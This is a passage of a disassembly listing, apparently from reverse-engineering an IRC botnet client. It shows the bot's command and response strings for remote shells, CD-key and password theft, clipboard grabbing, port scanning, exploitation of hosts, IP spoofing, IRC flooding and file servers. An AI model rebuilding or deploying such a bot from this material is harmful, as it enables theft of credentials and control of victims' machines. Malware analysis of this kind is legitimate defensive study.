aConnectbacksta db 'connectbackstats',0 ; DATA XREF: sub_401CC7+153C�o
align 4
; char aCbstats[]
aCbstats db 'cbstats',0 ; DATA XREF: sub_401CC7+1551�o
; char aExploitlist[]
aExploitlist db 'exploitlist',0 ; DATA XREF: sub_401CC7+1566�o
; char aExplist[]
aExplist db 'explist',0 ; DATA XREF: sub_401CC7+157B�o
; char aReconnect[]
aReconnect db 'reconnect',0 ; DATA XREF: sub_401CC7+1590�o
align 4
; char aR[]
aR: ; DATA XREF: sub_401CC7+15A5�o
unicode 0, <r>,0
; char aQuitReconnecti[]
aQuitReconnecti db 'QUIT :reconnecting',0Dh,0Ah,0 ; DATA XREF: sub_401CC7:loc_404744�o
align 10h
dword_4418E0 dd 234032Dh, 6E69616Dh, 202D0302h, 6F636552h, 63656E6Eh
; DATA XREF: sub_401CC7+2A8A�o
dd 676E6974h, 2Eh
; char aDisconnect[]
aDisconnect db 'disconnect',0 ; DATA XREF: sub_401CC7+15BA�o
align 4
; char aDc[]
aDc db 'dc',0 ; DATA XREF: sub_401CC7+15CF�o
align 4
; char aQuitDisconnect[]
aQuitDisconnect db 'QUIT :disconnecting',0Dh,0Ah,0 ; DATA XREF: sub_401CC7:loc_404722�o
align 4
dword_441924 dd 234032Dh, 6E69616Dh, 202D0302h, 63736944h, 656E6E6Fh
; DATA XREF: sub_401CC7+2A68�o
dd 6E697463h, 2E67h
; char aQuit_0[]
aQuit_0 db 'quit',0 ; DATA XREF: sub_401CC7+15E4�o
align 4
; char aQ[]
aQ: ; DATA XREF: sub_401CC7+15F9�o
unicode 0, <q>,0
; char aQuitS[]
aQuitS db 'QUIT :%s',0Dh,0Ah,0 ; DATA XREF: sub_401CC7+2A33�o
align 4
; char aQuitLater[]
aQuitLater db 'QUIT :later',0Dh,0Ah,0 ; DATA XREF: sub_401CC7:loc_40470C�o
align 4
; char aStatus[]
aStatus db 'status',0 ; DATA XREF: sub_401CC7+160E�o
align 10h
; char aS_2[]
aS_2: ; DATA XREF: sub_401CC7+1623�o
unicode 0, <s>,0
unk_441974 db 2Dh ; - ; DATA XREF: sub_401CC7+2A0C�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aStatusReady_Bo db 'Status: Ready. Bot Uptime: %s.',0
align 10h
; char aId[]
aId db 'id',0 ; DATA XREF: sub_401CC7+1638�o
align 4
; char aI_0[]
aI_0 db 'i',0 ; DATA XREF: sub_401CC7+164D�o
align 4
; char asc_4419A8[]
asc_4419A8 db '-' ; DATA XREF: sub_401CC7+29CD�o
db 3, 34h, 2
dd 6E69616Dh, 202D0302h, 20746F42h, 203A4449h, 2E7325h
; char aReboot[]
aReboot db 'reboot',0 ; DATA XREF: sub_401CC7+1662�o
align 4
; char asc_4419C8[]
asc_4419C8 db '-' ; DATA XREF: sub_401CC7+1679�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aRebootingSyste db 'Rebooting system.',0
align 4
unk_4419E8 db 2Dh ; - ; DATA XREF: sub_401CC7+1680�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aFailedToReboot db 'Failed to reboot system.',0
align 10h
; char aThreads[]
aThreads db 'threads',0 ; DATA XREF: sub_401CC7+16B4�o
; char aT[]
aT: ; DATA XREF: sub_401CC7+16C9�o
unicode 0, <t>,0
; char aSub[]
aSub db 'sub',0 ; DATA XREF: sub_401CC7+2929�o
; char asc_441A20[]
asc_441A20 db '-' ; DATA XREF: sub_401CC7+294F�o
db 3, 34h, 2
dd 65726874h, 2736461h, 4C202D03h, 20747369h, 65726874h
dd 2E736461h, 0
unk_441A40 db 2Dh ; - ; DATA XREF: sub_401CC7+29BE�o
db 3, 34h, 2
db 74h ; t
db 68h, 72h, 65h
db 61h ; a
db 64h, 73h, 2
db 3
aFailedToStartL db '- Failed to start list thread, error: <%d>.',0
align 4
; char aAliases[]
aAliases db 'aliases',0 ; DATA XREF: sub_401CC7+16DE�o
; char aAl[]
aAl db 'al',0 ; DATA XREF: sub_401CC7+16F3�o
align 4
dword_441A88 dd 234032Dh, 6E69616Dh, 202D0302h, 61696C41h, 696C2073h
; DATA XREF: sub_401CC7+28D7�o
dd 2E7473h
; char aLog[]
aLog db 'log',0 ; DATA XREF: sub_401CC7+1708�o
; char aLg[]
aLg db 'lg',0 ; DATA XREF: sub_401CC7+171D�o
align 4
; char aS_37[]
aS_37 db '%s',0 ; DATA XREF: sub_401CC7+27F9�o
align 4
; char asc_441AAC[]
asc_441AAC db '-' ; DATA XREF: sub_401CC7+284D�o
db 3, 34h, 2
dd 2676F6Ch, 4C202D03h, 69747369h, 6C20676Eh, 2E676Fh
unk_441AC4 db 2Dh ; - ; DATA XREF: sub_401CC7+28BC�o
db 3, 34h, 2
db 6Ch ; l
db 6Fh, 67h, 2
db 3
aFailedToStar_3 db '- Failed to start listing thread, error: <%d>.',0
; char aClearlog[]
aClearlog db 'clearlog',0 ; DATA XREF: sub_401CC7+1732�o
align 4
; char aClg[]
aClg db 'clg',0 ; DATA XREF: sub_401CC7+1747�o
; char aNetinfo[]
aNetinfo db 'netinfo',0 ; DATA XREF: sub_401CC7+175C�o
; char aNi[]
aNi db 'ni',0 ; DATA XREF: sub_401CC7+1771�o
align 4
dword_441B18 dd 234032Dh, 6E69616Dh, 202D0302h, 7774654Eh, 206B726Fh
; DATA XREF: sub_401CC7+27A5�o
dd 6F666E49h, 2Eh
; char aSysinfo[]
aSysinfo db 'sysinfo',0 ; DATA XREF: sub_401CC7+1786�o
; char aSi[]
aSi db 'si',0 ; DATA XREF: sub_401CC7+179B�o
align 10h
dword_441B40 dd 234032Dh, 6E69616Dh, 202D0302h, 74737953h, 49206D65h
; DATA XREF: sub_401CC7+2776�o
dd 2E6F666Eh, 0
; char aRemove[]
aRemove db 'remove',0 ; DATA XREF: sub_401CC7+17B0�o
align 4
; char aRm[]
aRm db 'rm',0 ; DATA XREF: sub_401CC7+17C5�o
align 4
dword_441B68 dd 234032Dh, 6E69616Dh, 202D0302h, 6F6D6552h, 676E6976h
; DATA XREF: sub_401CC7+2721�o
dd 746F4220h, 2Eh
; char aProcs[]
aProcs db 'procs',0 ; DATA XREF: sub_401CC7+17DA�o
align 4
; char aPs[]
aPs db 'ps',0 ; DATA XREF: sub_401CC7+17EF�o
align 10h
unk_441B90 db 2Dh ; - ; DATA XREF: sub_401CC7+2611�o
db 3, 34h, 2
db 70h ; p
db 72h, 6Fh, 63h
db 73h ; s
db 2, 3, 2Dh
aAlreadyRunning db ' Already running.',0
align 10h
; char aFull[]
aFull db 'full',0 ; DATA XREF: sub_401CC7+2670�o
align 4
; char asc_441BB8[]
asc_441BB8 db '-' ; DATA XREF: sub_401CC7+2690�o
db 3, 34h, 2
dd 636F7270h, 2D030273h, 6F725020h, 73656363h, 696C2073h
dd 2E7473h
; char asc_441BD4[]
asc_441BD4 db '-' ; DATA XREF: sub_401CC7+2705�o
db 3, 34h, 2
db 70h ; p
db 72h, 6Fh, 63h
db 73h ; s
db 2, 3, 2Dh
aFailedToStar_4 db ' Failed to start listing thread, error: <%d>.',0
align 10h
; char aGetcdkeys[]
aGetcdkeys db 'getcdkeys',0 ; DATA XREF: sub_401CC7+1804�o
align 4
; char aKey[]
aKey db 'key',0 ; DATA XREF: sub_401CC7+1819�o
dword_441C20 dd 234032Dh, 656B6463h, 3027379h ; DATA XREF: sub_401CC7+25EE�o
aSearchComplete db '- Search completed.',0
; char aUptime[]
aUptime db 'uptime',0 ; DATA XREF: sub_401CC7+182E�o
align 4
; char aUp[]
aUp db 'up',0 ; DATA XREF: sub_401CC7+1843�o
align 4
; char asc_441C4C[]
asc_441C4C db '-' ; DATA XREF: sub_401CC7+25A2�o
db 3, 34h, 2
dd 6E69616Dh, 202D0302h, 69747055h, 203A656Dh, 2E7325h
; char aDriveinfo[]
aDriveinfo db 'driveinfo',0 ; DATA XREF: sub_401CC7+1858�o
align 10h
; char aDrv[]
aDrv db 'drv',0 ; DATA XREF: sub_401CC7+186D�o
; char aTestdlls[]
aTestdlls db 'testdlls',0 ; DATA XREF: sub_401CC7+1882�o
align 10h
; char aDll[]
aDll db 'dll',0 ; DATA XREF: sub_401CC7+1897�o
; char aOpencmd[]
aOpencmd db 'opencmd',0 ; DATA XREF: sub_401CC7+18AC�o
; char aOcmd[]
aOcmd db 'ocmd',0 ; DATA XREF: sub_401CC7+18C1�o
align 4
unk_441C94 db 2Dh ; - ; DATA XREF: sub_401CC7+24B4�o
db 3, 34h, 2
db 63h ; c
db 6Dh, 64h, 2
db 3
aRemoteShellAlr db '- Remote shell already running.',0
align 10h
unk_441CC0 db 2Dh ; - ; DATA XREF: sub_401CC7+24D0�o
db 3, 34h, 2
db 63h ; c
db 6Dh, 64h, 2
db 3
aCouldnTOpenRem db '- Couldn',27h,'t open remote shell.',0
align 4
; char asc_441CE8[]
asc_441CE8 db '-' ; DATA XREF: sub_401CC7:loc_40419E�o
db 3, 34h, 2
db 63h ; c
db 6Dh, 64h, 2
db 3
aRemoteShellRea db '- Remote shell ready.',0
align 4
; char aCmdstop[]
aCmdstop db 'cmdstop',0 ; DATA XREF: sub_401CC7+18D6�o
aRemoteShell db 'Remote shell',0 ; DATA XREF: sub_401CC7+18EF�o
align 10h
dword_441D20 dd 234032Dh, 2646D63h, 2D03h ; DATA XREF: sub_401CC7+18F4�o
; char aWho[]
aWho db 'who',0 ; DATA XREF: sub_401CC7+18FF�o
dword_441D30 dd 234032Dh, 69676F6Ch, 696C206Eh, 3027473h, 2Dh
; DATA XREF: sub_401CC7+191C�o
aEmpty db '<Empty>',0 ; DATA XREF: sub_401CC7:loc_40360D�o
; char aD_S[]
aD_S db '%d. %s',0 ; DATA XREF: sub_401CC7+1953�o
align 4
unk_441D54 db 2Dh ; - ; DATA XREF: sub_401CC7+1988�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aLoginListCompl db 'Login list complete.',0
align 4
; char aGetclip[]
aGetclip db 'getclip',0 ; DATA XREF: sub_401CC7+1A15�o
; char aGc[]
aGc db 'gc',0 ; DATA XREF: sub_401CC7+1A2A�o
align 4
dword_441D84 dd 234032Dh, 70696C63h, 72616F62h, 61642064h, 3026174h
; DATA XREF: sub_401CC7+2470�o
dd 2Dh
dword_441D9C dd 234032Dh, 6E69616Dh, 202D0302h, 20746547h, 70696C43h
; DATA XREF: sub_401CC7+249E�o
dd 72616F62h, 2E64h
; char aFlusharp[]
aFlusharp db 'flusharp',0 ; DATA XREF: sub_401CC7+1A3F�o
align 4
; char aFarp[]
aFarp db 'farp',0 ; DATA XREF: sub_401CC7+1A54�o
align 4
unk_441DCC db 2Dh ; - ; DATA XREF: sub_401CC7+2459�o
db 3, 34h, 2
db 66h ; f
db 6Ch, 75h, 73h
db 68h ; h
db 64h, 6Eh, 73h
db 2
db 3, 2Dh, 20h
aArpCacheFlushe db 'ARP cache flushed.',0
align 10h
unk_441DF0 db 2Dh ; - ; DATA XREF: sub_401CC7:loc_404127�o
db 3, 34h, 2
db 66h ; f
db 6Ch, 75h, 73h
db 68h ; h
db 64h, 6Eh, 73h
db 2
db 3, 2Dh, 20h
aFailedToFlushA db 'Failed to flush ARP cache.',0
align 4
; char aFlushdns[]
aFlushdns db 'flushdns',0 ; DATA XREF: sub_401CC7+1A69�o
align 4
; char aFdns[]
aFdns db 'fdns',0 ; DATA XREF: sub_401CC7+1A7E�o
align 10h
unk_441E30 db 2Dh ; - ; DATA XREF: sub_401CC7+2427�o
db 3, 34h, 2
db 66h ; f
db 6Ch, 75h, 73h
db 68h ; h
db 64h, 6Eh, 73h
db 2
db 3, 2Dh, 20h
aDnsCacheFlushe db 'DNS cache flushed.',0
align 4
unk_441E54 db 2Dh ; - ; DATA XREF: sub_401CC7:loc_4040F5�o
db 3, 34h, 2
db 66h ; f
db 6Ch, 75h, 73h
db 68h ; h
db 64h, 6Eh, 73h
db 2
db 3, 2Dh, 20h
aFailedToFlushD db 'Failed to flush DNS cache.',0
align 10h
; char asc_441E80[]
asc_441E80 db '-' ; DATA XREF: sub_401CC7:loc_4040FC�o
db 3, 34h, 2
db 66h ; f
db 6Ch, 75h, 73h
db 68h ; h
db 64h, 6Eh, 73h
db 2
db 3, 2Dh, 20h
aFailedToLoadDn db 'Failed to load dnsapi.dll.',0
align 4
; char aCurrentip[]
aCurrentip db 'currentip',0 ; DATA XREF: sub_401CC7+1A93�o
align 4
; char aCip[]
aCip db 'cip',0 ; DATA XREF: sub_401CC7+1AA8�o
; char aRloginserver[]
aRloginserver db 'rloginserver',0 ; DATA XREF: sub_401CC7+1ABD�o
align 4
; char aRlogin[]
aRlogin db 'rlogin',0 ; DATA XREF: sub_401CC7+1AD2�o
align 4
; char asc_441ED4[]
asc_441ED4 db '-' ; DATA XREF: sub_401CC7+2365�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aServerListenin db '- Server listening on IP: %s:%d, Username: %s.',0
unk_441F10 db 2Dh ; - ; DATA XREF: sub_401CC7+23D4�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aFailedToStar_5 db '- Failed to start server thread, error: <%d>.',0
align 4
; char aHttpserver[]
aHttpserver db 'httpserver',0 ; DATA XREF: sub_401CC7+1AE7�o
align 4
; char aHttp[]
aHttp db 'http',0 ; DATA XREF: sub_401CC7+1AFC�o
align 10h
; char asc_441F60[]
asc_441F60 db '-' ; DATA XREF: sub_401CC7+2214�o
db 3, 34h, 2
db 68h ; h
db 2 dup(74h), 70h
db 64h ; d
db 2, 3, 2Dh
aServerListen_0 db ' Server listening on IP: %s:%d, Directory: %s\.',0
; char asc_441F9C[]
asc_441F9C db '-' ; DATA XREF: sub_401CC7+227F�o
db 3, 34h, 2
db 68h ; h
db 2 dup(74h), 70h
db 64h ; d
db 2, 3, 2Dh
aFailedToStar_6 db ' Failed to start server thread, error: <%d>.',0
align 4
; char aTftpserver[]
aTftpserver db 'tftpserver',0 ; DATA XREF: sub_401CC7+1B11�o
align 4
; char aTftp[]
aTftp db 'tftp',0 ; DATA XREF: sub_401CC7+1B26�o
align 4
unk_441FEC db 2Dh ; - ; DATA XREF: sub_401CC7+1FE9�o
db 3, 34h, 2
db 74h ; t
db 66h, 74h, 70h
db 64h ; d
db 2, 3, 2Dh
aAlreadyRunni_0 db ' Already running.',0
align 4
; char asc_44200C[]
asc_44200C db '-' ; DATA XREF: sub_401CC7+209E�o
db 3, 34h, 2
db 74h ; t
db 66h, 74h, 70h
db 64h ; d
db 2, 3, 2Dh
aServerStarte_1 db ' Server started on Port: %d, File: %s.',0
align 10h
unk_442040 db 2Dh ; - ; DATA XREF: sub_401CC7+210D�o
db 3, 34h, 2
db 74h ; t
db 66h, 74h, 70h
db 64h ; d
db 2, 3, 2Dh
aFailedToStar_7 db ' Failed to start server thread, error: <%d>.',0
align 4
; char aCrash[]
aCrash db 'crash',0 ; DATA XREF: sub_401CC7+1B3B�o
align 4
; char asc_442084[]
asc_442084 db '-' ; DATA XREF: sub_401CC7+1B51�o
db 3, 34h, 2
dd 6E69616Dh, 202D0302h, 73617243h, 676E6968h, 746F6220h
dd 2Eh
aCrash_0 db 'crash',0 ; DATA XREF: sub_401CC7+1B8B�o
align 4
; char aScan_0[]
aScan_0 db 'scan',0 ; DATA XREF: sub_401CC7+1BA1�o
align 10h
; char aScan_1[]
aScan_1 db 'scan',0 ; DATA XREF: sub_401CC7+1BB6�o
align 4
; char asc_4420B8[]
asc_4420B8 db '-' ; DATA XREF: sub_401CC7+1D25�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 61h ; a
db 2 dup(6Ch), 2
db 3
aAlreadyDScanni db '- Already %d scanning threads. Too many specified.',0
unk_4420F8 db 2Dh ; - ; DATA XREF: sub_401CC7:loc_403C9A�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 61h ; a
db 2 dup(6Ch), 2
db 3
aFailedToStar_8 db '- Failed to start scan, port is invalid.',0
align 10h
aRandom db 'Random',0 ; DATA XREF: sub_401CC7+1EE3�o
align 4
aSequential db 'Sequential',0 ; DATA XREF: sub_401CC7+1EEA�o
align 4
; char asc_442144[]
asc_442144 db '-' ; DATA XREF: sub_401CC7+1F15�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 61h ; a
db 2 dup(6Ch), 2
db 3
aSPortScanStart db '- %s Port Scan started on %s:%d with a delay of %d seconds for %d'
db ' minutes using %d threads.',0
align 10h
; char asc_4421B0[]
asc_4421B0 db '-' ; DATA XREF: sub_401CC7+1F86�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 61h ; a
db 2 dup(6Ch), 2
db 3
aFailedToStar_9 db '- Failed to start scan thread, error: <%d>.',0
align 4
; char aPhonehome[]
aPhonehome db 'phonehome',0 ; DATA XREF: sub_401CC7+1BCB�o
align 4
; char aNoticeSPhoning[]
aNoticeSPhoning db 'NOTICE %s :PHONING HOME: hi ;).',0Dh,0Ah,0 ; DATA XREF: sub_401CC7+1BE2�o
align 4
; char aFindpass[]
aFindpass db 'findpass',0 ; DATA XREF: sub_401CC7+1BF8�o
align 4
; char aFp[]
aFp db 'fp',0 ; DATA XREF: sub_401CC7+1C09�o
align 4
; char asc_44222C[]
asc_44222C db '-' ; DATA XREF: sub_401CC7+1C52�o
db 3, 34h, 2
db 66h ; f
db 69h, 6Eh, 64h
db 70h ; p
db 61h, 2 dup(73h)
db 2
db 3, 2Dh, 20h
aSearchingForPa db 'Searching for password.',0
unk_442254 db 2Dh ; - ; DATA XREF: sub_401CC7+1CCC�o
db 3, 34h, 2
db 66h ; f
db 69h, 6Eh, 64h
db 70h ; p
db 61h, 2 dup(73h)
db 2
db 3, 2Dh, 20h
aFailedToSta_10 db 'Failed to start search thread, error: <%d>.',0
; char aSpoof[]
aSpoof db 'spoof',0 ; DATA XREF: sub_401CC7+19A8�o
align 4
; char Str2[]
Str2 db 'off',0 ; DATA XREF: sub_401CC7+19BC�o
; char asc_44229C[]
asc_44229C db '-' ; DATA XREF: sub_401CC7+19D7�o
db 3, 34h, 2
db 77h ; w
db 69h, 73h, 64h
db 6Fh ; o
db 6Dh, 28h, 73h
db 70h ; p
db 2 dup(6Fh), 66h
db 29h ; )
db 2, 3, 2Dh
aSpoofingDisabl db ' Spoofing disabled.',0
; char aGet_2[]
aGet_2 db 'get',0 ; DATA XREF: sub_401CC7:loc_404C25�o
unk_4422C8 db 2Dh ; - ; DATA XREF: sub_401CC7+2F80�o
db 3, 34h, 2
db 77h ; w
db 69h, 73h, 64h
db 6Fh ; o
db 6Dh, 28h, 73h
db 70h ; p
db 2 dup(6Fh), 66h
db 29h ; )
db 2, 3, 2Dh
aSpoofingCurren db ' Spoofing currently set to ',27h,'%s',27h,'.',0
align 10h
; char aD_D_D_[]
aD_D_D_ db '%d.%d.%d.*',0 ; DATA XREF: sub_401CC7+2FD9�o
align 4
unk_44230C db 2Dh ; - ; DATA XREF: sub_401CC7+2FEE�o
db 3, 34h, 2
db 77h ; w
db 69h, 73h, 64h
db 6Fh ; o
db 6Dh, 28h, 73h
db 70h ; p
db 2 dup(6Fh), 66h
db 29h ; )
db 2, 3, 2Dh
aSpoofingCurr_0 db ' Spoofing currently set to ',27h,'%s',27h,'.',0
align 4
unk_442344 db 2Dh ; - ; DATA XREF: sub_401CC7+3002�o
db 3, 34h, 2
db 77h ; w
db 69h, 73h, 64h
db 6Fh ; o
db 6Dh, 28h, 73h
db 70h ; p
db 2 dup(6Fh), 66h
db 29h ; )
db 2, 3, 2Dh
aSIsAnInvalidIp db ' ',27h,'%s',27h,' is an invalid IP address.',0
; char asc_442378[]
asc_442378 db '-' ; DATA XREF: sub_401CC7+3020�o
db 3, 34h, 2
db 77h ; w
db 69h, 73h, 64h
db 6Fh ; o
db 6Dh, 28h, 73h
db 70h ; p
db 2 dup(6Fh), 66h
db 29h ; )
db 2, 3, 2Dh
aSpoofIpSetToS_ db ' Spoof IP set to ',27h,'%s',27h,'.',0
align 4
; char aExploit[]
aExploit db 'exploit',0 ; DATA XREF: sub_401CC7+303C�o
; char asc_4423AC[]
asc_4423AC db '-' ; DATA XREF: sub_401CC7+30C3�o
db 3, 34h, 2
db 65h ; e
db 78h, 70h, 6Ch
db 6Fh ; o
db 69h, 74h, 2
db 3
aAttemptingToCo db '- attempting to compromise %s...',0
align 4
unk_4423DC db 2Dh ; - ; DATA XREF: sub_401CC7+3135�o
db 3, 34h, 2
db 65h ; e
db 78h, 70h, 6Ch
db 6Fh ; o
db 69h, 74h, 2
db 3
aFailedToStartE db '- Failed to start exploiter thread, error: <%d>.',0
align 4
; char aReconnect_in[]
aReconnect_in db 'reconnect.in',0 ; DATA XREF: sub_401CC7+3142�o
align 4
; char aRin[]
aRin db 'rin',0 ; DATA XREF: sub_401CC7+3159�o
; char aQuitReconnec_1[]
aQuitReconnec_1 db 'QUIT :reconnecting',0Dh,0Ah,0 ; DATA XREF: sub_401CC7:loc_409AB7�o
align 4
; char asc_442448[]
asc_442448 db '-' ; DATA XREF: sub_401CC7+7E06�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aReconnectingIn db 'Reconnecting in %s seconds',0
align 10h
; char aReconnect_in_m[]
aReconnect_in_m db 'reconnect.in.ms',0 ; DATA XREF: sub_401CC7+3170�o
; char aRinms[]
aRinms db 'rinms',0 ; DATA XREF: sub_401CC7+3187�o
align 4
; char aQuitReconnec_0[]
aQuitReconnec_0 db 'QUIT :reconnecting',0Dh,0Ah,0 ; DATA XREF: sub_401CC7:loc_409A73�o
align 10h
; char asc_4424A0[]
asc_4424A0 db '-' ; DATA XREF: sub_401CC7+7DC2�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aReconnecting_0 db 'Reconnecting in %s ms',0
align 4
; char aFlood[]
aFlood db 'flood',0 ; DATA XREF: sub_401CC7+319E�o
align 4
; char aLoad[]
aLoad db 'load',0 ; DATA XREF: sub_401CC7+31BF�o
align 4
; char asc_4424D4[]
asc_4424D4 db '-' ; DATA XREF: sub_401CC7+3216�o
db 3, 34h, 2
db 69h ; i
db 72h, 63h, 66h
db 75h ; u
db 63h, 6Bh, 2
db 3
aSClonesLoadedT db '- %s clones loaded to %s:%s',0
align 10h
; char aPm_1[]
aPm_1 db 'pm',0 ; DATA XREF: sub_401CC7+3246�o
align 4
; char asc_442504[]
asc_442504: ; DATA XREF: sub_401CC7+3261�o
unicode 0, < >,0
; char a__7[]
a__7: ; DATA XREF: sub_401CC7+3266�o
unicode 0, <_>,0
; char aPrivmsgSS[]
aPrivmsgSS db 'privmsg %s :%s',0 ; DATA XREF: sub_401CC7+3295�o
align 4
; char aCt[]
aCt db 'ct',0 ; DATA XREF: sub_401CC7+32B0�o
align 10h
; char asc_442520[]
asc_442520: ; DATA XREF: sub_401CC7+32CB�o
unicode 0, < >,0
; char a_[]
a_: ; DATA XREF: sub_401CC7+32D0�o
unicode 0, <_>,0
; char aPrivmsgS[]
aPrivmsgS db 'privmsg %s :' ; DATA XREF: sub_401CC7+32FF�o
dd 1732501h, 0
; char aNt_1[]
aNt_1 db 'nt',0 ; DATA XREF: sub_401CC7+331A�o
align 10h
; char asc_442540[]
asc_442540: ; DATA XREF: sub_401CC7+3335�o
unicode 0, < >,0
; char a__8[]
a__8: ; DATA XREF: sub_401CC7+333A�o
unicode 0, <_>,0
; char aNoticeSS_1[]
aNoticeSS_1 db 'notice %s :%s',0 ; DATA XREF: sub_401CC7+3369�o
align 4
; char aMode[]
aMode db 'mode',0 ; DATA XREF: sub_401CC7+3384�o
align 10h
; char asc_442560[]
asc_442560: ; DATA XREF: sub_401CC7+339F�o
unicode 0, < >,0
; char a__0[]
a__0: ; DATA XREF: sub_401CC7+33A4�o
unicode 0, <_>,0
; char aModeSS[]
aModeSS db 'mode %s %s',0 ; DATA XREF: sub_401CC7+33D3�o
align 4
; char aJoin[]
aJoin db 'join',0 ; DATA XREF: sub_401CC7+33EE�o
align 4
; char aJoinS[]
aJoinS db 'join %s',0 ; DATA XREF: sub_401CC7+3410�o
; char aPart_1[]
aPart_1 db 'part',0 ; DATA XREF: sub_401CC7+342B�o
align 4
; char aPartS[]
aPartS db 'part %s',0 ; DATA XREF: sub_401CC7+344D�o
; char aPartflood[]
aPartflood db 'partflood',0 ; DATA XREF: sub_401CC7+3468�o
align 10h
; char aPartSS[]
aPartSS db 'part %s %s',0 ; DATA XREF: sub_401CC7+348F�o
align 4
; char aPnick[]
aPnick db 'pnick',0 ; DATA XREF: sub_401CC7+34AA�o
align 4
; char aSI[]
aSI db '%s%i',0 ; DATA XREF: sub_401CC7+34EB�o
align 4
; char aNickS_0[]
aNickS_0 db 'NICK %s',0 ; DATA XREF: sub_401CC7+3506�o
; char aJoinPart[]
aJoinPart db 'join/part',0 ; DATA XREF: sub_401CC7+3521�o
align 10h
; char aJoinS_0[]
aJoinS_0 db 'join %s',0 ; DATA XREF: sub_401CC7+354F�o
; char aPartSS_0[]
aPartSS_0 db 'part %s %s',0 ; DATA XREF: sub_401CC7+357B�o
align 4
; char aJoinS_1[]
aJoinS_1 db 'join %s',0 ; DATA XREF: sub_401CC7+35B6�o
; char aPartSS_1[]
aPartSS_1 db 'part %s %s',0 ; DATA XREF: sub_401CC7+35F6�o
align 4
; char aJoinS_2[]
aJoinS_2 db 'join %s',0 ; DATA XREF: sub_401CC7+361D�o
; char aPartSS_2[]
aPartSS_2 db 'part %s %s',0 ; DATA XREF: sub_401CC7+365D�o
align 4
; char aDcc[]
aDcc db 'dcc',0 ; DATA XREF: sub_401CC7+3678�o
; char aPrivmsgS_0[]
aPrivmsgS_0 db 'PRIVMSG %s :' ; DATA XREF: sub_401CC7+36F5�o
dd 43434401h, 4E455320h, 64252044h, 2064252Eh, 25206425h
dd 64252064h, 1
; char aNick_0[]
aNick_0 db 'nick',0 ; DATA XREF: sub_401CC7+3710�o
align 10h
; char aJoinS_3[]
aJoinS_3 db 'join %s',0 ; DATA XREF: sub_401CC7+373A�o
; char aNickS_1[]
aNickS_1 db 'NICK %s',0 ; DATA XREF: sub_401CC7+376D�o
; char aNickS_2[]
aNickS_2 db 'NICK %s',0 ; DATA XREF: sub_401CC7+37B5�o
; char aNickS_3[]
aNickS_3 db 'NICK %s',0 ; DATA XREF: sub_401CC7+37FD�o
; char aChgnick[]
aChgnick db 'chgnick',0 ; DATA XREF: sub_401CC7+3818�o
; char aNickS_4[]
aNickS_4 db 'NICK %s',0 ; DATA XREF: sub_401CC7+3842�o
; char aMsg[]
aMsg db 'msg',0 ; DATA XREF: sub_401CC7+385D�o
; char aJoinS_4[]
aJoinS_4 db 'join %s',0 ; DATA XREF: sub_401CC7+388B�o
; char aPrivmsgSS_0[]
aPrivmsgSS_0 db 'privmsg %s :%s',0 ; DATA XREF: sub_401CC7+38B7�o
align 4
; char aPrivmsgSS_1[]
aPrivmsgSS_1 db 'privmsg %s :%s',0 ; DATA XREF: sub_401CC7+38F7�o
align 4
; char aPrivmsgSS_2[]
aPrivmsgSS_2 db 'privmsg %s :%s',0 ; DATA XREF: sub_401CC7+3937�o
align 4
; char aNotice_2[]
aNotice_2 db 'notice',0 ; DATA XREF: sub_401CC7+3952�o
align 4
; char aJoinS_5[]
aJoinS_5 db 'join %s',0 ; DATA XREF: sub_401CC7+3980�o
; char aNoticeSS_2[]
aNoticeSS_2 db 'NOTICE %s :%s',0 ; DATA XREF: sub_401CC7+39AC�o
align 4
; char aNoticeSS_3[]
aNoticeSS_3 db 'NOTICE %s :%s',0 ; DATA XREF: sub_401CC7+39EC�o
align 4
; char aNoticeSS_4[]
aNoticeSS_4 db 'NOTICE %s :%s',0 ; DATA XREF: sub_401CC7+3A2C�o
align 4
; char aCtcp[]
aCtcp db 'ctcp',0 ; DATA XREF: sub_401CC7+3A47�o
align 4
; char aJoinS_6[]
aJoinS_6 db 'join %s',0 ; DATA XREF: sub_401CC7+3A75�o
; char aPrivmsgS_1[]
aPrivmsgS_1 db 'PRIVMSG %s :' ; DATA XREF: sub_401CC7+3A9C�o
dd 6E697001h, 167h
; char aPrivmsgS_2[]
aPrivmsgS_2 db 'PRIVMSG %s :' ; DATA XREF: sub_401CC7+3AD7�o
dd 72657601h, 6E6F6973h, 1
; char aPrivmsgS_3[]
aPrivmsgS_3 db 'PRIVMSG %s :' ; DATA XREF: sub_401CC7+3B12�o
dd 6E696601h, 1726567h, 0
; char aPrivmsgS_4[]
aPrivmsgS_4 db 'PRIVMSG %s :' ; DATA XREF: sub_401CC7+3B4D�o
dd 6E696601h, 1726567h, 0
; char aMix[]
aMix db 'mix',0 ; DATA XREF: sub_401CC7+3B68�o
; char aJoinS_7[]
aJoinS_7 db 'join %s',0 ; DATA XREF: sub_401CC7+3B96�o
; char aPrivmsgS_5[]
aPrivmsgS_5 db 'PRIVMSG %s :' ; DATA XREF: sub_401CC7+3BBD�o
dd 6E697001h, 167h
; char aNoticeSS_5[]
aNoticeSS_5 db 'NOTICE %s :%s',0 ; DATA XREF: sub_401CC7+3BFD�o
align 4
; char aPrivmsgSS_3[]
aPrivmsgSS_3 db 'PRIVMSG %s :%s',0 ; DATA XREF: sub_401CC7+3C3D�o
align 4
; char aNoticeSS_6[]
aNoticeSS_6 db 'NOTICE %s :%s',0 ; DATA XREF: sub_401CC7+3C7D�o
align 4
; char aRegister[]
